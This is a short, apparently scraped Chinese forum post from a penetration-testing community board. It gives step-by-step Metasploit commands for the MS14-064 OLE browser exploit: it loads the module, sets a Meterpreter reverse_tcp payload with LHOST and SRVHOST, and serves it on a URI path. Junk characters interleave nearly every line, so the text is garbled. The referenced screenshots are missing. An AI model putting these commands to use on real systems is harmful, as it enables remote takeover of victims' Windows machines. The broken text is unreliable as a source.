" f3 L5 o; D7 I& V8 ^. A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示/ i" W3 z! R9 q0 s
. X' d$ S, |% z9 x# L 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 0 |. m# e" v3 p; D& }
) G2 C* n7 z( h( h+ y/ V然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
set AllowPowershellPrompt true) `8 s, a# v& C# `/ R+ b. H
5 K" R3 n1 _- ^' `9 f Set LHOST 192.168.0.109 H- C4 [. L- Q6 V# O, U1 d1 A$ }
. m3 e- f( w* {$ d; L: |1 ?3 d: w, r0 [, _5 ~ set SRVHOST 192.168.0.109
/ r! i6 H3 Q0 k! z& H8 |" ^Set uripath share
; O' P# ?6 Z- U( {" X: ^ Set srvport 804 `( d; v7 g5 B4 j
% d( C9 _: Z. _# x& Y, O0 K& S + k9 T: L H% H3 R
9 E M; {5 m( h2 x; }; f+ O2 G3 K4 P' {: {" J & N1 W; @" I3 f0 t. z, c) V/ d9 C. O* F/ P
: _9 a% Q! m2 d' M- \! f# Y9 C" H! c, C5 y" U5 P; T
! ~) q" x2 _; e$ `0 A : E. T* V2 o _2 q, i [; Z: a
5 D' G$ M! H8 i0 p' D( i下面我们来访问本地地址如图:+ Y% s0 j' _! L' U8 A
8 ]& k8 ~ C7 i$ Y0 k) z6 @
" F- b$ V# C# a" B* Y% e' V4 X3 o9 j8 z; p$ ^+ f K& F# B6 j4 D5 j. |3 C" P n
( h: k h# @0 T, f: p; ?! Z- H3 G
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |